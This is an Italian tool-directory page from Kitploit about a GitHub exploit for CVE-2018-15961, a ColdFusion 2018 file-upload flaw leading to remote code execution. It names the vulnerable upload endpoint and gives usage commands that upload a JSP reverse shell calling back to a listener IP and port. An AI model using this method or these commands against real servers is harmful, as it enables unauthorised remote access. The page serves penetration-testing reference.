Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-15961 — Exploit per CVE-2018-15961, una vulnerabilità di upload di file senza restrizioni in Adobe ColdFusion 2018 che porta a RCE. | Kitploit
Strumenti/GitHubGitHub/xbufu/cve-2018-15961
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubxbufu/cve-2018-15961

CVE-2018-15961

Exploit per CVE-2018-15961, una vulnerabilità di upload di file senza restrizioni in Adobe ColdFusion 2018 che porta a RCE.

Vedi Repository
345 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-15961 - Adobe ColdFusion 2018 RCE

Questo repository contiene il mio codice exploit per la vulnerabilità RCE in Adobe ColdFusion 2018.

Descrizione dell'Exploit

L'exploit invia una richiesta POST contenente una reverse shell JSP a /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm. Se ha successo, carica la shell in /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell.jsp. Il codice attiva quindi la shell inviando una semplice richiesta GET.

Utilizzo

root@kitploit:~
# Utilizzo base
python3 coldfusion_rce.py -u http://172.31.1.15:8500 -l 10.10.0.25 -p 443

# Con nome file personalizzato per la shell
python3 coldfusion_rce.py -u http://172.31.1.15:8500 -l 10.10.0.25 -p 443 -f reverse.jsp
Scarica lo strumento